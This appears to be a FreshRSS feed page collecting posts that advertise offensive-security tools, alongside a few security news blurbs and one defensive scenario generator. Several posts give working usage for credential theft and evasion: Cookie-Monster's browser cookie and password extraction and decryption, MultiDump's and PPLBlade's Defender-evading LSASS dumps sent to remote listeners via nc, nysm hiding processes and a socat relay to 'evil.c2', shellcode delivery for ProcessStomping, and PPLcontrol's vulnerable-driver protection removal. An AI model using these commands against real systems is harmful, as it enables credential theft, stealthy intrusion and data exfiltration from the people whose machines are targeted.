FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

Cookie-Monster - BOF To Steal Browser Cookies & Credentials

By: Zion3R


Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.


BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make is installed on the linux prior to compiling.

make

to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

  • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

By: Zion3R


AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


Star the Repo

If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

Features

  • Generates unique incident response scenarios based on chosen threat actor groups.
  • Allows you to specify your organisation's size and industry for a tailored scenario.
  • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
  • Create custom scenarios based on a selection of ATT&CK techniques.
  • Capture user feedback on the quality of the generated scenarios.
  • Downloadable scenarios in Markdown format.
  • πŸ†• Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
  • Available as a Docker container image for easy deployment.
  • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


Releases

v0.4 (current)

What's new? Why is it useful?
Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

v0.3

What's new? Why is it useful?
Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

- Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

- User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

v0.2

What's new? Why is it useful?
Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

- Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
Improved error handling for missing API keys - Improved user experience.
Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

v0.1

Initial release.

Requirements

  • Recent version of Python.
  • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
  • OpenAI API key.
  • LangChain API key (optional) - see LangSmith Setup section below for further details.
  • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

Installation

Option 1: Cloning the Repository

  1. Clone this repository:
git clone https://github.com/mrwadams/attackgen.git
  1. Change directory into the cloned repository:
cd attackgen
  1. Install the required Python packages:
pip install -r requirements.txt

Option 2: Using Docker

  1. Pull the Docker container image from Docker Hub:
docker pull mrwadams/attackgen

LangSmith Setup

If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

Data Setup

Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.

Running AttackGen

After the data setup, you can run AttackGen with the following command:

streamlit run πŸ‘‹_Welcome.py

You can also try the app on Streamlit Community Cloud.

Usage

Running AttackGen

Option 1: Running the Streamlit App Locally

  1. Run the Streamlit app:
streamlit run πŸ‘‹_Welcome.py
  1. Open your web browser and navigate to the URL provided by Streamlit.
  2. Use the app to generate standard or custom incident response scenarios (see below for details).

Option 2: Using the Docker Container Image

  1. Run the Docker container:
docker run -p 8501:8501 mrwadams/attackgen

This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501. 3. Use the app to generate standard or custom incident response scenarios (see below for details).

Generating Scenarios

Standard Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisatin's industry and size from the dropdown menus.
  4. Navigate to the Threat Group Scenarios page.
  5. Select the Threat Actor Group that you want to simulate.
  6. Click on 'Generate Scenario' to create the incident response scenario.
  7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Custom Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisation's industry and size from the dropdown menus.
  4. Navigate to the Custom Scenario page.
  5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
  6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
  7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

Contributing

I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

Licence

This project is licensed under GNU GPLv3.



MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

By: Zion3R


MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

Blog post: https://xre0us.io/posts/multidump


MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

Usage

    __  __       _ _   _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
|_|

Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections to for slower network speeds
-v Enable v erbose mode

MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

Handler for RemoteProcDump

options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection

As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.

The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.

By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.

MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.

In remote mode, MultiDump connects to the handler's listener.

./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001

The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.

An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.

Building MultiDump

Open in Visual Studio, build in Release mode.

Customising MultiDump

It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

Self deletion can be toggled by uncommenting the following line in Common.h:

#define SELF_DELETION

To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

//#define DEBUG

MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/

Credits



HijackLoader Evolves: Researchers Decode the Latest Evasion Methods

The threat actors behind a loader malware called&nbsp;HijackLoader&nbsp;have added new techniques for defense evasion, as the malware continues to be increasingly used by other threat actors to deliver additional payloads and tooling. "The malware developer used a standard process hollowing technique coupled with an additional trigger that was activated by the parent process writing to a pipe,"

Nysm - A Stealth Post-Exploitation Container

By: Zion3R


A stealth post-exploitation container.

Introduction

With the raise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: Would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:

  • bpftool
  • bpflist-bpfcc
  • ps
  • top
  • sockstat
  • ss
  • rkhunter
  • chkrootkit
  • lsof
  • auditd
  • etc...

All these tools go blind to what goes through nysm. It hides:

  • New eBPF programs
  • New eBPF maps ️
  • New eBPF links ο”—
  • New Auditd generated logs ο“°
  • New PIDs οͺͺ
  • New sockets ο”Œ

Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.

Β 

Installation

Requirements

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

Linux headers

cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

Build

cd ./nysm/src/
make

Usage

nysm is a simple program to run before the intended command:

Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

Examples

Run a hidden bash:

./nysm bash

Run a hidden ssh and remove ./nysm:

./nysm -r ssh user@domain

Run a hidden socat as a daemon and remove ./nysm:

./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

How it works

In general

As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.

To differentiate nysm events from the others, everything runs inside a seperated PID namespace.

Hide eBPF objects

bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.

To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exists, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().

Hide Auditd logs

Auditd receives its logs from recvfrom() which stores its messages in a buffer.

If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header by 0.

Hide PIDS

Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

As getdents64() requires to loop through all its files, the eBPF instructions limit is easily reached. Therefore, nysm uses tail calls before reaching it.

Hide sockets

Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools as they cannot find the process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer and the returned value is the length of all these messages combined.

Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

These are collected from the connect() and bind() calls.

Limitations

Even with the best effort, nysm still has some limitations.

  • Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But, if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

  • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

  • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

  • Hiding ss recvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.

  • Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.

Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.



PPLBlade - Protected Process Dumper Tool

By: Zion3R


Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

Overview of the techniques, used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.

It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.

Modes:

  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert obfuscated(--obfuscate) dump file to its original state
  3. Cleanup - Do cleanup manually, in case something goes wrong on execution (Note that the option values should be the same as for the execution, we're trying to clean up)
  4. DoThatLsassThing - Dump lsass.exe using Process Explorer driver (basic poc)

Handle Modes:

  1. Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
  2. Procexp - Uses PROCEXP152.sys to obtain a handle
Examples:

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade


ProcessStomping - A Variation Of ProcessOverwriting To Execute Shellcode On An Executable'S Section

By: Zion3R


A variation of ProcessOverwriting to execute shellcode on an executable's section

What is it

For a more detailed explanation you can read my blog post

Process Stomping, is a variation of hasherezade’s Process Overwriting and it has the advantage of writing a shellcode payload on a targeted section instead of writing a whole PE payload over the hosting process address space.

These are the main steps of the ProcessStomping technique:

  1. CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the processes primary thread.
  2. WriteProcessMemory - used to write each malicious shellcode to the target process section.
  3. SetThreadContext - used to point the entrypoint to a new code section that it has written.
  4. ResumeThread - self-explanatory.

As an example application of the technique, the PoC can be used with sRDI to load a beacon dll over an executable RWX section. The following picture describes the steps involved.


Disclaimer

All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

This work has been made possible because of the knowledge and tools shared by Aleksandra Doniec @hasherezade and Nick Landers.

Usage

Select your target process and modify global variables accordingly in ProcessStomping.cpp.

Compile the sRDI project making sure that the offset is enough to jump over your generated sRDI shellcode blob and then update the sRDI tools:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

Generate a Reflective-Loaderless dll payload of your choice and then generate sRDI shellcode blob:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

The shellcode blob can then be xored with a key-word and downloaded using a simple socket

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

Deliver the xored blob upon connection

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

The sRDI blob will get erased after execution to remove unneeded artifacts.

Caveats

To successfully execute this technique you should select the right target process and use a dll payload that doesn't come with a User Defined Reflective loader.

Detection opportunities

Process Stomping technique requires starting the target process in a suspended state, changing the thread's entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.



New PoolParty Process Injection Techniques Outsmart Top EDR Solutions

A new collection of eight process injection techniques, collectively dubbed&nbsp;PoolParty, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems. SafeBreach researcher Alon Leviev&nbsp;said&nbsp;the methods are "capable of working across all processes without any limitations, making them more flexible than existing process

N. Korean Lazarus Group Targets Software Vendor Using Known Flaws

The North Korea-alignedΒ Lazarus GroupΒ has been attributed as behind a new campaign in which an unnamed software vendor was compromised through the exploitation of known security flaws in another high-profile software. The attack sequences, according to Kaspersky, culminated in the deployment of malware families such as SIGNBT andΒ LPEClient, a known hacking tool used by the threat actor for

Malvertising Campaign Targets Brazil's PIX Payment System with GoPIX Malware

The popularity of Brazil'sΒ PIXΒ instant payment system has made it aΒ lucrative target for threat actorsΒ looking to generate illicit profits using a new malware called GoPIX. Kaspersky, which has been tracking the active campaign since December 2022, said the attacks are pulled offΒ using malicious adsΒ that are served when potential victims search for "WhatsApp web" on search engines. "The

Researchers Uncover New GPU Side-Channel Vulnerability Leaking Sensitive Data

By: THN
A novel side-channel attack calledΒ GPU.zipΒ renders virtually all modern graphics processing units (GPU) vulnerable to information leakage. "This channel exploits an optimization that is data dependent, software transparent, and present in nearly all modern GPUs: graphical data compression," a group of academics from the University of Texas at Austin, Carnegie Mellon University, University of

PPLcontrol - Controlling Windows PP(L)s

By: Zion3R


This tool allows you to list protected processes, get the protection level of a specific process, or set an arbitrary protection level. For more information, you can read this blog post: Debugging Protected Processes.


Usage

1. Download the MSI driver

You can get a copy of the MSI driver RTCore64.sys here: PPLKiller/driver.

2. Install the MSI driver

Disclaimer: it goes without saying that you should never install this driver on your host machine. Use a VM!

sc.exe create RTCore64 type= kernel start= auto binPath= C:\PATH\TO\RTCore64.sys DisplayName= "Micro - Star MSI Afterburner"
net start RTCore64

3. Use PPLcontrol

List protected processes.

PPLcontrol.exe list

Get the protection level of a specific process.

PPLcontrol.exe get 1234

Set an arbitrary protection level.

PPLcontrol.exe set 1234 PPL WinTcb

Protect a non-protected process with an arbitrary protection level. This will also automatically adjust the signature levels accordingly.

PPLcontrol.exe protect 1234 PPL WinTcb

Unprotect a protected process. This will set the protection level to 0 (i.e. None) and the EXE/DLL signature levels to 0 (i.e. Unchecked).

PPLcontrol.exe unprotect 1234

4. Uninstall the driver

net stop RTCore64
sc.exe delete RTCore64

Use cases

Debugging a protected process with WinDbg

WinDbg just needs to open the target process, so you can use PPLcontrol to set an arbitrary protection level on your windbg.exe process.

  1. Get the PID of the windbg.exe process.
  2. Use PPLcontrol to set an arbitrary protection level.
Console 1 24,840 K C:\Temp>PPLcontrol.exe protect 1232 PPL WinTcb [+] The Protection 'PPL-WinTcb' was set on the process with PID 1232, previous protection was: 'None-None'. [+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1232." dir="auto">
C:\Temp>tasklist | findstr /i windbg
windbg.exe 1232 Console 1 24,840 K
C:\Temp>PPLcontrol.exe protect 1232 PPL WinTcb
[+] The Protection 'PPL-WinTcb' was set on the process with PID 1232, previous protection was: 'None-None'.
[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1232.

Inspecting a protected process with API Monitor

In addition to opening the target process, API monitor injects a DLL into it. Therefore, setting an arbitrary protection level on your apimonitor.exe process won't suffice. Since the injected DLL is not properly signed for this purpose, the Section signature flag of the target process will likely prevent it from being loaded. However, you can temporarily disable the protection on the target process, start monitoring it, and restore the protection right after.

Failed to load module in target process - Error: 577, Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
  1. Get the PID of the target process.
  2. Use PPLcontrol to get the protection level of the target process.
  3. Unprotect the process.
  4. Start monitoring the process with API Monitor.
  5. Restore the protection of the target process.
C:\Temp>tasklist | findstr /i target
target.exe 1337 Services 1 14,160 K
C:\Temp>PPLcontrol.exe get 1337
[+] The process with PID 1337 is a PPL with the Signer type 'WinTcb' (6).
C:\Temp>PPLcontrol.exe unprotect 1337
[+] The process with PID 1337 is no longer a PP(L).

C:\Temp>PPLcontrol.exe protect 1337 PPL WinTcb
[+] The Protection 'PPL-WinTcb' was set on the process with PID 1337, previous protection was: 'None-None'.
[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1337.

Build

  1. Open the solution in Visual Studio.
  2. Select Release/x64 (x86 is not supported and will probably never be).
  3. Build solution

Credit



Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#

By: Zion3R


Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.

This is a project that I started working on as I progressed through Offensive Security's PEN-300 course. One of my favorite modules from the course is the process injection & migration section which inspired me to be build a tool to help me be more efficient in during that activity. A special thanks goes out to ShadowKhan who provided valuable feedback which helped provide creative direction to make this utility visually appealing and enhanced its usability with suggested filtering capabilities.


Usage

Injection Enumeration >> https://github.com/gh0x0st Usage: wanderer [target options] <value> [filter options] <value> [output options] <value> Target Options: -i, --id, Target a single or group of processes by their id number -n, --name, Target a single or group of processes by their name -c, --current, Target the current process and reveal the current privilege level -a, --all, Target every running process Filter Options: --include-denied, Include instances where process access is denied --exclude-32, Exclude instances where the process architecture is 32-bit --exclude-64, Exclude instances where the process architecture is 64-bit --exclude-amsiloaded, Exclude instances where amsi.dll is a loaded process module --exclude-amsiunloaded, Exclude instances where amsi is not loaded process module --exclude-integrity, Exclude instances where the process integrity level is a specific value Output Options: --output-nested, Output the results in a nested style view -q, --quiet, Do not output the banner Examples: Enumerate the process with id 12345 C:\> wanderer --id 12345 Enumerate all processes with the names process1 and processs2 C:\> wanderer --name process1,process2 Enumerate the current process privilege level C:\> wanderer --current Enumerate all 32-bit processes C:\wanderer --all --exclude-64 Enumerate all processes where is AMSI is loaded C:\> wanderer --all --exclude-amsiunloaded Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32" dir="auto">
PS C:\> .\wanderer.exe

>> Process Injection Enumeration
>> https://github.com/gh0x0st

Usage: wanderer [target options] <value> [filter options] <value> [output options] <value>

Target Options:

-i, --id, Target a single or group of processes by their id number
-n, --name, Target a single or group of processes by their name
-c, --current, Target the current process and reveal the current privilege level
-a, --all, Target every running process

Filter Options:

--include-denied, Include instances where process access is denied
--exclude-32, Exclude instances where the process architecture is 32-bit
--exclude-64, Exclude instances where the process architecture is 64-bit
--exclude-amsiloaded, Exclude instances where amsi.dll is a loaded proces s module
--exclude-amsiunloaded, Exclude instances where amsi is not loaded process module
--exclude-integrity, Exclude instances where the process integrity level is a specific value

Output Options:

--output-nested, Output the results in a nested style view
-q, --quiet, Do not output the banner

Examples:

Enumerate the process with id 12345
C:\> wanderer --id 12345

Enumerate all processes with the names process1 and processs2
C:\> wanderer --name process1,process2

Enumerate the current process privilege level
C:\> wanderer --current

Enumerate all 32-bit processes
C:\wanderer --all --exclude-64

Enumerate all processes where is AMSI is loaded
C:\> wanderer --all --exclude-amsiunloaded

